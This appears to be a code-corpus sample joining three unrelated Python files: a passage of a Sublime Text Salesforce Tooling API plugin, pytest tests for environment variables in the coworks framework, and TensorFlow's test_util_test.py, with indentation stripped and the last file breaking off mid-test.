result = api.result
# If creation failed, just remove the local file
if not result["success"]:
os.remove(file_name)
return
# If creation succeeded, just open it
sublime.active_window().open_file(file_name)
# Get the created component id
component_id = result.get("id")
extension = "." + settings[component_type]["suffix"]
# Save it to component.sublime-settings
s = sublime.load_settings(COMPONENT_METADATA_SETTINGS)
username = settings["username"]
components_dict = s.get(username, {})
# Prevent exception for creating component if no component in org
if component_type not in components_dict:
if not components_dict:
components_dict = {component_type : {}}
else:
components_dict[component_type] = {}
# Build components dict
lower_name = component_name.lower()
attributes = {
"id": component_id,
"name": component_name,
"url": post_url + "/" + component_id,
"body": markup_or_body,
"extension": extension,
"type": component_type,
"is_test": lower_name.startswith("test") or lower_name.endswith("test")
}
components_dict[component_type][fullName.lower()] = attributes
s.set(username, components_dict)
# Save settings and show success message
sublime.save_settings(COMPONENT_METADATA_SETTINGS)
# After new component is stored into cache, reload cache in globals()
sublime.set_timeout(lambda:util.load_metadata_cache(True), 50)
# Create Meta.xml File
if component_type in ["ApexClass", "ApexTrigger"]:
meta_file_content = ("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" +\
"<{0} xmlns=\"http://soap.sforce.com/2006/04/metadata\">\n" +\
" <apiVersion>{1}.0</apiVersion>\n" +\
" <status>Active</status>\n" +\
"</{0}>").format(component_type, settings["api_version"])
elif component_type in ["ApexPage", "ApexComponent"]:
meta_file_content = ("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" +\
"<{0} xmlns=\"http://soap.sforce.com/2006/04/metadata\">\n" +\
" <apiVersion>{1}.0</apiVersion>\n" +\
" <label>{2}</label>\n" +\
"</{0}>").format(component_type, settings["api_version"], component_name)
# Generate new meta.xml file
with open(file_name+"-meta.xml", "w") as fp:
fp.write(meta_file_content)
# After all are finished, we need to keep the lastModifiedDate
handle_set_component_attribute(attributes)
settings = context.get_settings()
api = ToolingApi(settings)
post_url = "/sobjects/" + component_type
thread = threading.Thread(target=api.post, args=(post_url, data, ))
thread.start()
fullName = os.path.basename(file_name)
ThreadProgress(api, thread, "Creating Component %s" % fullName,
"Creating Component %s Succeed" % fullName)
handle_thread(thread, timeout)
def handle_set_component_attribute(attributes, timeout=120):
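# Queries the server-side LastModifiedDate of the component that was just
# saved or created and stores it in the local metadata cache, then reloads
# that cache.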
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda:handle_thread(thread, timeout), timeout)
return
result = api.result
if result["success"] and result["records"]:
lastModifiedDate = result["records"][0]["LastModifiedDate"]
util.set_component_attribute(attributes, lastModifiedDate)
elif settings["debug_mode"]:
pprint.pprint(result)
# Refresh metadata cache
util.load_metadata_cache(True)
settings = context.get_settings()
api = ToolingApi(settings)
soql = "SELECT LastModifiedDate FROM %s WHERE Id = '%s'" % (
attributes["type"], attributes["id"]
)
thread = threading.Thread(target=api.query, args=(soql, True, ))
thread.start()
handle_thread(thread, timeout)
def handle_refresh_static_resource(component_attribute, file_name, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda:handle_thread(thread, timeout), timeout)
return
if not api.result["success"]: return
with open (file_name, "wb") as fp:
fp.write(api.result["body"].encode("utf-8"))
settings = context.get_settings()
api = ToolingApi(settings)
url = component_attribute["url"] + "/body"
thread = threading.Thread(target=api.retrieve_body, args=(url, ))
thread.start()
ThreadProgress(api, thread, 'Refresh StaticResource', 'Refresh StaticResource Succeed')
handle_thread(thread, timeout)
def handle_create_static_resource(data, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda:handle_thread(thread, timeout), timeout)
return
if not api.result["success"]:
return
print(api.result)
settings = context.get_settings()
api = ToolingApi(settings)
url = "/tooling/sobjects/StaticResource"
thread = threading.Thread(target=api.post, args=(url, data, ))
thread.start()
ThreadProgress(api, thread, 'Creating StaticResource', 'Creating StaticResource Succeed')
handle_thread(thread, timeout)
def handle_diff_with_server(component_attribute, file_name, source_org=None, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda:handle_thread(thread, timeout), timeout)
return
result = api.result
# If error, just skip, error is processed in ThreadProgress
if not result["success"]: return
# Diff Change Compare
diff.diff_changes(file_name, result)
# If source_org is not None, we need to switch project back
if settings["switch_back_after_migration"] and source_org:
util.switch_project(source_org)
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.get, args=(component_attribute["url"], ))
thread.start()
handle_thread(thread, timeout)
ThreadProgress(api, thread, 'Diff With Server', 'Diff With Server Succeed')
def handle_refresh_file_from_server(attr, file_name, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda:handle_thread(thread, timeout), timeout)
return
result = api.result
if not result["success"]:
return
with open(file_name, "wb") as fp:
fp.write(result[attr["body"]].encode("utf-8"))
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.get, args=(attr["url"], ))
thread.start()
ThreadProgress(api, thread, 'Refreshing %s' % os.path.basename(file_name), 'Refresh Succeed')
handle_thread(thread, timeout)
def handle_delete_component(component_url, file_name, timeout=120):
def handle_thread(thread, timeout):
if thread.is_alive():
sublime.set_timeout(lambda:handle_thread(thread, timeout), timeout)
return
# If succeed
result = api.result
if not result["success"]: return
# Get active window
window = sublime.active_window()
# Remove file from disk and close related view
view = util.get_view_by_file_name(file_name)
if view:
window.focus_view(view)
window.run_command("close")
os.remove(file_name)
# Remove the related cls-meta.xml
if os.path.exists(file_name+"-meta.xml"):
view = util.get_view_by_file_name(file_name+"-meta.xml")
if view:
window.focus_view(view)
window.run_command("close")
os.remove(file_name+"-meta.xml")
settings = context.get_settings()
api = ToolingApi(settings)
thread = threading.Thread(target=api.delete, args=(component_url, ))
thread.start()
file_base_name = os.path.basename(file_name)
ThreadProgress(api, thread, "Deleting " + file_base_name,
"Delete " + file_base_name + " Succeed")
handle_thread(thread, timeout)
|
test_environment.py
|
import os
import threading
import time
from pathlib import Path
import pytest
import requests
from coworks.config import Config, ProdConfig
from coworks.cws.runner import CwsRunner
from coworks.cws.runner import ThreadedLocalServer
from tests.coworks.tech_ms import *
class WithEnvMS(SimpleMS):
def __init__(self, **kwargs):
super().__init__(**kwargs)
@self.before_first_activation
def init(event, context):
assert os.getenv("test") is not None
@entry
def get(self):
"""Root access."""
return os.getenv("test")
class TestClass:
def test_dev_stage(self, local_server_factory, example_dir):
config = Config(environment_variables_file=Path(example_dir) / "config" / "vars_dev.json")
local_server = local_server_factory(WithEnvMS(configs=config))
response = local_server.make_call(requests.get, '/')
assert response.status_code == 200
assert response.text == 'test dev environment variable'
def test_run_dev_stage(self, example_dir):
config = Config(environment_variables_file=Path("config") / "vars_dev.json")
app = WithEnvMS(configs=config)
CwsRunner(app)
port = ThreadedLocalServer.unused_tcp_port()
server = threading.Thread(target=run_server_example, args=(example_dir, app, port), daemon=True)
server.start()
counter = 1
time.sleep(counter)
while not server.is_alive() and counter < 3:
time.sleep(counter)
counter += 1
response = requests.get(f'http://localhost:{port}/', headers={'Authorization': "token"})
assert response.text == "test dev environment variable"
def test_secret_stage(self, local_server_factory, example_dir):
config = Config(environment_variables_file=Path(example_dir) / "config" / "vars_prod.json")
local_server = local_server_factory(WithEnvMS(configs=config))
response = local_server.make_call(requests.get, '/')
assert response.status_code == 200
assert response.text == 'test secret environment variable'
def test_workspace_stage(self, local_server_factory, example_dir):
config = Config(workspace='test', environment_variables_file=Path(example_dir) / "config" / "vars_prod.json")
local_server = local_server_factory(WithEnvMS(configs=config), workspace='test')
response = local_server.make_call(requests.get, '/')
assert response.status_code == 200
assert response.text == 'test secret environment variable'
def test_prod_stage(self, local_server_factory, example_dir):
def auth(*args):
return True
config1 = Config(environment_variables_file=Path(example_dir) / "config" / "vars_dev.json")
config2 = ProdConfig(environment_variables_file=Path(example_dir) / "config" / "vars_prod.json", auth=auth)
local_server = local_server_factory(WithEnvMS(configs=[config1, config2]), workspace="v1")
response = local_server.make_call(requests.get, '/', headers={'authorization':'token'})
assert response.status_code == 200
assert response.text == 'test secret environment variable'
def test_not_prod_stage(self, local_server_factory, example_dir):
config1 = Config(workspace='1', environment_variables_file=Path(example_dir) / "config" / "vars_dev.json")
config2 = ProdConfig(environment_variables_file=Path(example_dir) / "config" / "vars_prod.json")
local_server = local_server_factory(WithEnvMS(configs=[config1, config2]), workspace='1')
response = local_server.make_call(requests.get, '/')
assert response.status_code == 200
assert response.text == 'test dev environment variable'
def test_no_config_stage(self, local_server_factory, example_dir):
config1 = Config(environment_variables_file=Path(example_dir) / "config" / "vars_dev.json")
config2 = ProdConfig(environment_variables_file=Path(example_dir) / "config" / "vars_prod.json")
local_server = local_server_factory(WithEnvMS(configs=[config1, config2]),
project_dir=Path(example_dir) / "config", workspace='1')
response = local_server.make_call(requests.get, '/')
assert response.status_code == 200
assert response.text == 'test default environment variable'
def test_env_var(self, local_server_factory):
config = Config(environment_variables={'test': 'test value environment variable'})
local_server = local_server_factory(WithEnvMS(configs=config))
response = local_server.make_call(requests.get, '/')
assert response.status_code == 200
assert response.text == 'test value environment variable'
def test_wrong_env_var_name(self, local_server_factory):
config = Config(environment_variables={'1test': 'test value environment variable'})
with pytest.raises(KeyError) as pytest_wrapped_e:
local_server = local_server_factory(WithEnvMS(configs=config))
assert pytest_wrapped_e.type == KeyError
assert pytest_wrapped_e.value.args[0] == "Wrong environment variable name: 1test"
def run_server_example(example_dir, app, port):
print(f"Server starting on port {port}")
app.execute('run', host='localhost', port=port, project_dir=example_dir, module='example', workspace='dev')
|
test_util_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.test_util."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import random
import threading
import unittest
import weakref
from absl.testing import parameterized
import numpy as np
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import meta_graph_pb2
from tensorflow.python.compat import compat
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import combinations
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_ops # pylint: disable=unused-import
from tensorflow.python.framework import test_util
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
class TestUtilTest(test_util.TensorFlowTestCase, parameterized.TestCase):
def test_assert_ops_in_graph(self):
with ops.Graph().as_default():
constant_op.constant(["hello", "taffy"], name="hello")
test_util.assert_ops_in_graph({"hello": "Const"}, ops.get_default_graph())
self.assertRaises(ValueError, test_util.assert_ops_in_graph,
{"bye": "Const"}, ops.get_default_graph())
self.assertRaises(ValueError, test_util.assert_ops_in_graph,
{"hello": "Variable"}, ops.get_default_graph())
@test_util.run_deprecated_v1
def test_session_functions(self):
with self.test_session() as sess:
sess_ref = weakref.ref(sess)
with self.cached_session(graph=None, config=None) as sess2:
# We make sure that sess2 is sess.
assert sess2 is sess
# We make sure we raise an exception if we use cached_session with
# different values.
with self.assertRaises(ValueError):
with self.cached_session(graph=ops.Graph()) as sess2:
pass
with self.assertRaises(ValueError):
with self.cached_session(force_gpu=True) as sess2:
pass
# We make sure that test_session will cache the session even after the
# with scope.
assert not sess_ref()._closed
with self.session() as unique_sess:
unique_sess_ref = weakref.ref(unique_sess)
with self.session() as sess2:
assert sess2 is not unique_sess
# We make sure the session is closed when we leave the with statement.
assert unique_sess_ref()._closed
def test_assert_equal_graph_def(self):
with ops.Graph().as_default() as g:
def_empty = g.as_graph_def()
constant_op.constant(5, name="five")
constant_op.constant(7, name="seven")
def_57 = g.as_graph_def()
with ops.Graph().as_default() as g:
constant_op.constant(7, name="seven")
constant_op.constant(5, name="five")
def_75 = g.as_graph_def()
# Comparing strings is order dependent
self.assertNotEqual(str(def_57), str(def_75))
# assert_equal_graph_def doesn't care about order
test_util.assert_equal_graph_def(def_57, def_75)
# Compare two unequal graphs
with self.assertRaisesRegex(AssertionError,
r"^Found unexpected node '{{node seven}}"):
test_util.assert_equal_graph_def(def_57, def_empty)
def testIsGoogleCudaEnabled(self):
# The test doesn't assert anything. It ensures the py wrapper
# function is generated correctly.
if test_util.IsGoogleCudaEnabled():
print("GoogleCuda is enabled")
else:
print("GoogleCuda is disabled")
def testIsMklEnabled(self):
# This test doesn't assert anything.
# It ensures the py wrapper function is generated correctly.
if test_util.IsMklEnabled():
print("MKL is enabled")
else:
print("MKL is disabled")
@test_util.run_in_graph_and_eager_modes
def testAssertProtoEqualsStr(self):
graph_str = "node { name: 'w1' op: 'params' }"
graph_def = graph_pb2.GraphDef()
text_format.Merge(graph_str, graph_def)
# test string based comparison
self.assertProtoEquals(graph_str, graph_def)
# test original comparison
self.assertProtoEquals(graph_def, graph_def)
@test_util.run_in_graph_and_eager_modes
def testAssertProtoEqualsAny(self):
# Test assertProtoEquals with a protobuf.Any field.
meta_graph_def_str = """
meta_info_def {
meta_graph_version: "outer"
any_info {
[type.googleapis.com/tensorflow.MetaGraphDef] {
meta_info_def {
meta_graph_version: "inner"
}
}
}
}
"""
meta_graph_def_outer = meta_graph_pb2.MetaGraphDef()
meta_graph_def_outer.meta_info_def.meta_graph_version = "outer"
meta_graph_def_inner = meta_graph_pb2.MetaGraphDef()
meta_graph_def_inner.meta_info_def.meta_graph_version = "inner"
meta_graph_def_outer.meta_info_def.any_info.Pack(meta_graph_def_inner)
self.assertProtoEquals(meta_graph_def_str, meta_graph_def_outer)
self.assertProtoEquals(meta_graph_def_outer, meta_graph_def_outer)
# Check if the assertion failure message contains the content of
# the inner proto.
with self.assertRaisesRegex(AssertionError, r'meta_graph_version: "inner"'):
self.assertProtoEquals("", meta_graph_def_outer)
@test_util.run_in_graph_and_eager_modes
def testNDArrayNear(self):
a1 = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
a2 = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
a3 = np.array([[10.0, 20.0, 30.0], [40.0, 50.0, 60.0]])
self.assertTrue(self._NDArrayNear(a1, a2, 1e-5))
self.assertFalse(self._NDArrayNear(a1, a3, 1e-5))
@test_util.run_in_graph_and_eager_modes
def testCheckedThreadSucceeds(self):
def noop(ev):
ev.set()
event_arg = threading.Event()
self.assertFalse(event_arg.is_set())
t = self.checkedThread(target=noop, args=(event_arg,))
t.start()
t.join()
self.assertTrue(event_arg.is_set())
@test_util.run_in_graph_and_eager_modes
def testCheckedThreadFails(self):
def err_func():
return 1 // 0
t = self.checkedThread(target=err_func)
t.start()
with self.assertRaises(self.failureException) as fe:
t.join()
self.assertTrue("integer division or modulo by zero" in str(fe.exception))
@test_util.run_in_graph_and_eager_modes
def testCheckedThreadWithWrongAssertionFails(self):
x = 37
def err_func():
self.assertTrue(x < 10)
t = self.checkedThread(target=err_func)
t.start()
with self.assertRaises(self.failureException) as fe:
t.join()
self.assertTrue("False is not true" in str(fe.exception))
@test_util.run_in_graph_and_eager_modes
def testMultipleThreadsWithOneFailure(self):
def err_func(i):
self.assertTrue(i != 7)
threads = [
self.checkedThread(
target=err_func, args=(i,)) for i in range(10)
]
for t in threads:
t.start()
for i, t in enumerate(threads):
if i == 7:
with self.assertRaises(self.failureException):
t.join()
else:
t.join()
def _WeMustGoDeeper(self, msg):
with self.assertRaisesOpError(msg):
with ops.Graph().as_default():
node_def = ops._NodeDef("IntOutput", "name")
node_def_orig = ops._NodeDef("IntOutput", "orig")
op_orig = ops.Operation(node_def_orig, ops.get_default_graph())
op = ops.Operation(node_def, ops.get_default_graph(),
original_op=op_orig)
raise errors.UnauthenticatedError(node_def, op, "true_err")
@test_util.run_in_graph_and_eager_modes
def testAssertRaisesOpErrorDoesNotPassMessageDueToLeakedStack(self):
with self.assertRaises(AssertionError):
self._WeMustGoDeeper("this_is_not_the_error_you_are_looking_for")
self._WeMustGoDeeper("true_err")
self._WeMustGoDeeper("name")
self._WeMustGoDeeper("orig")
@test_util.run_in_graph_and_eager_modes
def testAllCloseTensors(self):
a_raw_data = [[1, 2, 3], [4, 5, 6], [7, 8, 9]]
a = constant_op.constant(a_raw_data)
b = math_ops.add(1, constant_op.constant([[0, 1, 2], [3, 4, 5], [6, 7, 8]]))
self.assertAllClose(a, b)
self.assertAllClose(a, a_raw_data)
a_dict = {"key": a}
b_dict = {"key": b}
self.assertAllClose(a_dict, b_dict)
x_list = [a, b]
y_list = [a_raw_data, b]
self.assertAllClose(x_list, y_list)
@test_util.run_in_graph_and_eager_modes
def testAllCloseScalars(self):
self.assertAllClose(7, 7 + 1e-8)
with self.assertRaisesRegex(AssertionError, r"Not equal to tolerance"):
self.assertAllClose(7, 7 + 1e-5)
@test_util.run_in_graph_and_eager_modes
def testAllCloseList(self):
with self.assertRaisesRegex(AssertionError, r"not close dif"):
self.assertAllClose([0], [1])
@test_util.run_in_graph_and_eager_modes
def testAllCloseDictToNonDict(self):
with self.assertRaisesRegex(ValueError, r"Can't compare dict to non-dict"):
self.assertAllClose(1, {"a": 1})
with self.assertRaisesRegex(ValueError, r"Can't compare dict to non-dict"):
self.assertAllClose({"a": 1}, 1)
@test_util.run_in_graph_and_eager_modes
def testAllCloseNamedtuples(self):
a = 7
b = (2., 3.)
c = np.ones((3, 2, 4)) * 7.
expected = {"a": a, "b": b, "c": c}
my_named_tuple = collections.namedtuple("MyNamedTuple", ["a", "b", "c"])
# Identity.
self.assertAllClose(expected, my_named_tuple(a=a, b=b, c=c))
self.assertAllClose(
my_named_tuple(a=a, b=b, c=c), my_named_tuple(a=a, b=b, c=c))
@test_util.run_in_graph_and_eager_modes
def testAllCloseDicts(self):
a = 7
b = (2., 3.)
c = np.ones((3, 2, 4)) * 7.
expected = {"a": a, "b": b, "c": c}
# Identity.
self.assertAllClose(expected, expected)
self.assertAllClose(expected, dict(expected))
# With each item removed.
for k in expected:
actual = dict(expected)
del actual[k]
with self.assertRaisesRegex(AssertionError, r"mismatched keys"):
self.assertAllClose(expected, actual)
# With each item changed.
with self.assertRaisesRegex(AssertionError, r"Not equal to tolerance"):
self.assertAllClose(expected, {"a": a + 1e-5, "b": b, "c": c})
with self.assertRaisesRegex(AssertionError, r"Shape mismatch"):
self.assertAllClose(expected, {"a": a, "b": b + (4.,), "c": c})
c_copy = np.array(c)
c_copy[1, 1, 1] += 1e-5
with self.assertRaisesRegex(AssertionError, r"Not equal to tolerance"):
self.assertAllClose(expected, {"a": a, "b": b, "c": c_copy})
@test_util.run_in_graph_and_eager_modes
def testAllCloseListOfNamedtuples(self):
my_named_tuple = collections.namedtuple("MyNamedTuple", ["x", "y"])
l1 = [
my_named_tuple(x=np.array([[2.3, 2.5]]), y=np.array([[0.97, 0.96]])),
my_named_tuple(x=np.array([[3.3, 3.5]]), y=np.array([[0.98, 0.99]]))
]
l2 = [
([[2.3, 2.5]], [[0.97, 0.96]]),
([[3.3, 3.5]], [[0.98, 0.99]]),
]
self.assertAllClose(l1, l2)
@test_util.run_in_graph_and_eager_modes
def testAllCloseNestedStructure(self):
a = {"x": np.ones((3, 2, 4)) * 7, "y": (2, [{"nested": {"m": 3, "n": 4}}])}
self.assertAllClose(a, a)
b = copy.deepcopy(a)
self.assertAllClose(a, b)
# Test mismatched values
b["y"][1][0]["nested"]["n"] = 4.2
with self.assertRaisesRegex(AssertionError,
r"\[y\]\[1\]\[0\]\[nested\]\[n\]"):
self.assertAllClose(a, b)
@test_util.run_in_graph_and_eager_modes
def testArrayNear(self):
a = [1, 2]
b = [1, 2, 5]
with self.assertRaises(AssertionError):
self.assertArrayNear(a, b, 0.001)
a = [1, 2]
b = [[1, 2], [3, 4]]
with self.assertRaises(TypeError):
self.assertArrayNear(a, b, 0.001)
a = [1, 2]
b = [1, 2]
self.assertArrayNear(a, b, 0.001)
@test_util.skip_if(True) # b/117665998
def testForceGPU(self):
with self.assertRaises(errors.InvalidArgumentError):
with self.test_session(force_gpu=True):
# this relies on us not having a GPU implementation for assert, which
# seems sensible
x = constant_op.constant(True)
y = [15]
control_flow_ops.Assert(x, y).run()
@test_util.run_in_graph_and_eager_modes
def testAssertAllCloseAccordingToType(self):
# test plain int
self.assertAllCloseAccordingToType(1, 1, rtol=1e-8, atol=1e-8)
# test float64
self.assertAllCloseAccordingToType(
np.asarray([1e-8], dtype=np.float64),
np.asarray([2e-8], dtype=np.float64),
rtol=1e-8, atol=1e-8
)
self.assertAllCloseAccordingToType(
constant_op.constant([1e-8], dtype=dtypes.float64),
constant_op.constant([2e-8], dtype=dtypes.float64),
rtol=1e-8,
atol=1e-8)
with self.assertRaises(AssertionError):
self.assertAllCloseAccordingToType(
np.asarray([1e-7], dtype=np.float64),
np.asarray([2e-7], dtype=np.float64),
rtol=1e-8, atol=1e-8
)
# test float32
self.assertAllCloseAccordingToType(
np.asarray([1e-7], dtype=np.float32),
np.asarray([2e-7], dtype=np.float32),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7
)
self.assertAllCloseAccordingToType(
constant_op.constant([1e-7], dtype=dtypes.float32),
constant_op.constant([2e-7], dtype=dtypes.float32),
rtol=1e-8,
atol=1e-8,
float_rtol=1e-7,
float_atol=1e-7)
with self.assertRaises(AssertionError):
self.assertAllCloseAccordingToType(
np.asarray([1e-6], dtype=np.float32),
np.asarray([2e-6], dtype=np.float32),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7
)
# test float16
self.assertAllCloseAccordingToType(
np.asarray([1e-4], dtype=np.float16),
np.asarray([2e-4], dtype=np.float16),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7,
half_rtol=1e-4, half_atol=1e-4
)
self.assertAllCloseAccordingToType(
constant_op.constant([1e-4], dtype=dtypes.float16),
constant_op.constant([2e-4], dtype=dtypes.float16),
rtol=1e-8,
atol=1e-8,
float_rtol=1e-7,
float_atol=1e-7,
half_rtol=1e-4,
half_atol=1e-4)
with self.assertRaises(AssertionError):
self.assertAllCloseAccordingToType(
np.asarray([1e-3], dtype=np.float16),
np.asarray([2e-3], dtype=np.float16),
rtol=1e-8, atol=1e-8,
float_rtol=1e-7, float_atol=1e-7,
half_rtol=1e-4, half_atol=1e-4
)
@test_util.run_in_graph_and_eager_modes
def testAssertAllEqual(self):
i = variables.Variable([100] * 3, dtype=dtypes.int32, name="i")
j = constant_op.constant([20] * 3, dtype=dtypes.int32, name="j")
k = math_ops.add(i, j, name="k")
self.evaluate(variables.global_variables_initializer())
self.assertAllEqual([100] * 3, i)
self.assertAllEqual([120] * 3, k)
self.assertAllEqual([20] * 3, j)
with self.assertRaisesRegex(AssertionError, r"not equal lhs"):
self.assertAllEqual([0] * 3, k)
@test_util.run_in_graph_and_eager_modes
def testAssertNotAllEqual(self):
i = variables.Variable([100], dtype=dtypes.int32, name="i")
j = constant_op.constant([20], dtype=dtypes.int32, name="j")
k = math_ops.add(i, j, name="k")
self.evaluate(variables.global_variables_initializer())
self.assertNotAllEqual([100] * 3, i)
self.assertNotAllEqual([120] * 3, k)
self.assertNotAllEqual([20] * 3, j)
with self.assertRaisesRegex(
AssertionError, r"two values are equal at all elements.*extra message"):
self.assertNotAllEqual([120], k, msg="extra message")
@test_util.run_in_graph_and_eager_modes
def testAssertNotAllClose(self):
# Test with arrays
self.assertNotAllClose([0.1], [0.2])
with self.assertRaises(AssertionError):
self.assertNotAllClose([-1.0, 2.0], [-1.0, 2.0])
# Test with tensors
x = constant_op.constant([1.0, 1.0], name="x")
y = math_ops.add(x, x)
self.assertAllClose([2.0, 2.0], y)
self.assertNotAllClose([0.9, 1.0], x)
with self.assertRaises(AssertionError):
self.assertNotAllClose([1.0, 1.0], x)
@test_util.run_in_graph_and_eager_modes
def testAssertNotAllCloseRTol(self):
# Test with arrays
with self.assertRaises(AssertionError):
self.assertNotAllClose([1.1, 2.1], [1.0, 2.0], rtol=0.2)
# Test with tensors
x = constant_op.constant([1.0, 1.0], name="x")
y = math_ops.add(x, x)
self.assertAllClose([2.0, 2.0], y)
with self.assertRaises(AssertionError):
self.assertNotAllClose([0.9, 1.0], x, rtol=0.2)
@test_util.run_in_graph_and_eager_modes
def testAssertNotAllCloseATol(self):
# Test with arrays
with self.assertRaises(AssertionError):
self.assertNotAllClose([1.1, 2.1], [1.0, 2.0], atol=0.2)
# Test with tensors
x = constant_op.constant([1.0, 1.0], name="x")
y = math_ops.add(x, x)
self.assertAllClose([2.0, 2.0], y)
with self.assertRaises(AssertionError):
self.assertNotAllClose([0.9, 1.0], x, atol=0.2)
@test_util.run_in_graph_and_eager_modes
def testAssertAllGreaterLess(self):
x = constant_op.constant([100.0, 110.0, 120.0], dtype=dtypes.float32)
y = constant_op.constant([10.0] * 3, dtype=dtypes.float32)
z = math_ops.add(x, y)
self.assertAllClose([110.0, 120.0, 130.0], z)
self.assertAllGreater(x, 95.0)
self.assertAllLess(x, 125.0)
with self.assertRaises(AssertionError):
self.assertAllGreater(x, 105.0)
with self.assertRaises(AssertionError):
self.assertAllGreater(x, 125.0)
with self.assertRaises(AssertionError):
self.assertAllLess(x, 115.0)
with self.assertRaises(AssertionError):
self.assertAllLess(x, 95.0)
@test_util.run_in_graph_and_eager_modes
def testAssertAllGreaterLessEqual(self):
x = constant_op.constant([100.0, 110.0, 120.0], dtype=dtypes.float32)
y = constant_op.constant([10.0] * 3, dtype=dtypes.float32)
z = math_ops.add(x, y)
self.assertAllEqual([110.0, 120.0, 130.0], z)
self.assertAllGreaterEqual(x, 95.0)
self.assertAllLessEqual(x, 125.0)
with self.assertRaises(AssertionError):
self.assertAllGreaterEqual(x, 105.0)
with self.assertRaises(AssertionError):
self.assertAllGreaterEqual(x, 125.0)
with self.assertRaises(AssertionError):
self.assertAllLessEqual(x, 115.0)
with self.assertRaises(AssertionError):
self.assertAllLessEqual(x, 95.0)
def testAssertAllInRangeWithNonNumericValuesFails(self):
s1 = constant_op.constant("Hello, ", name="s1")
c = constant_op.constant([1 + 2j, -3 + 5j], name="c")
b = constant_op.constant([False, True], name="b")
with self.assertRaises(AssertionError):
self.assertAllInRange(s1, 0.0, 1.0)
with self.assertRaises(AssertionError):
self.assertAllInRange(c, 0.0, 1.0)
with self.assertRaises(AssertionError):
self.assertAllInRange(b, 0, 1)
@test_util.run_in_graph_and_eager_modes
def testAssertAllInRange(self):
x = constant_op.constant([10.0, 15.0], name="x")
self.assertAllInRange(x, 10, 15)
with self.assertRaises(AssertionError):
self.assertAllInRange(x, 10, 15, open_lower_bound=True)
with self.assertRaises(AssertionError):
self.assertAllInRange(x, 10, 15, open_upper_bound=True)
with self.assertRaises(AssertionError):
self.assertAllInRange(
x, 10, 15, open_lower_bound=True, open_upper_bound=True)
@test_util.run_in_graph_and_eager_modes
def testAssertAllInRangeErrorMessageEllipses(self):
x_init = np.array([[10.0, 15.0]] * 12)
x = constant_op.constant(x_init, name="x")
with self.assertRaises(AssertionError):
self.assertAllInRange(x, 5, 10)
@test_util.run_in_graph_and_eager_modes
def testAssertAllInRangeDetectsNaNs(self):
x = constant_op.constant(
[[np.nan, 0.0], [np.nan, np.inf], [np.inf, np.nan]], name="x")
with self.assertRaises(AssertionError):
self.assertAllInRange(x, 0.0, 2.0)
@test_util.run_in_graph_and_eager_modes
def testAssertAllInRangeWithInfinities(self):
x = constant_op.constant([10.0, np.inf], name="x")
self.assertAllInRange(x, 10, np.inf)
with self.assertRaises(AssertionError):
self.assertAllInRange(x, 10, np.inf, open_upper_bound=True)
@test_util.run_in_graph_and_eager_modes
def testAssertAllInSet(self):
b = constant_op.constant([True, False], name="b")
x = constant_op.constant([13, 37], name="x")
self.assertAllInSet(b, [False, True])
self.assertAllInSet(b, (False, True))
self.assertAllInSet(b, {False, True})
self.assertAllInSet(x, [0, 13, 37, 42])
self.assertAllInSet(x, (0, 13, 37, 42))
self.assertAllInSet(x, {0, 13, 37, 42})
with self.assertRaises(AssertionError):
self.assertAllInSet(b, [False])
with self.assertRaises(AssertionError):
self.assertAllInSet(x, (42,))
def testRandomSeed(self):
# Call setUp again for WithCApi case (since it makes a new default graph
# after setup).
# TODO(skyewm): remove this when C API is permanently enabled.
with context.eager_mode():
self.setUp()
a = random.randint(1, 1000)
a_np_rand = np.random.rand(1)
a_rand = random_ops.random_normal([1])
# ensure that randomness in multiple testCases is deterministic.
self.setUp()
b = random.randint(1, 1000)
b_np_rand = np.random.rand(1)
b_rand = random_ops.random_normal([1])
self.assertEqual(a, b)
self.assertEqual(a_np_rand, b_np_rand)
self.assertAllEqual(a_rand, b_rand)
@test_util.run_in_graph_and_eager_modes
def test_callable_evaluate(self):
def model():
return resource_variable_ops.ResourceVariable(
name="same_name",
initial_value=1) + 1
with context.eager_mode():
self.assertEqual(2, self.evaluate(model))
@test_util.run_in_graph_and_eager_modes
def test_nested_tensors_evaluate(self):
expected = {"a": 1, "b": 2, "nested": {"d": 3, "e": 4}}
nested = {"a": constant_op.constant(1),
"b": constant_op.constant(2),
"nested": {"d": constant_op.constant(3),
"e": constant_op.constant(4)}}
self.assertEqual(expected, self.evaluate(nested))
def test_run_in_graph_and_eager_modes(self):
l = []
def inc(self, with_brackets):
del self # self argument is required by run_in_graph_and_eager_modes.
mode = "eager" if context.executing_eagerly() else "graph"
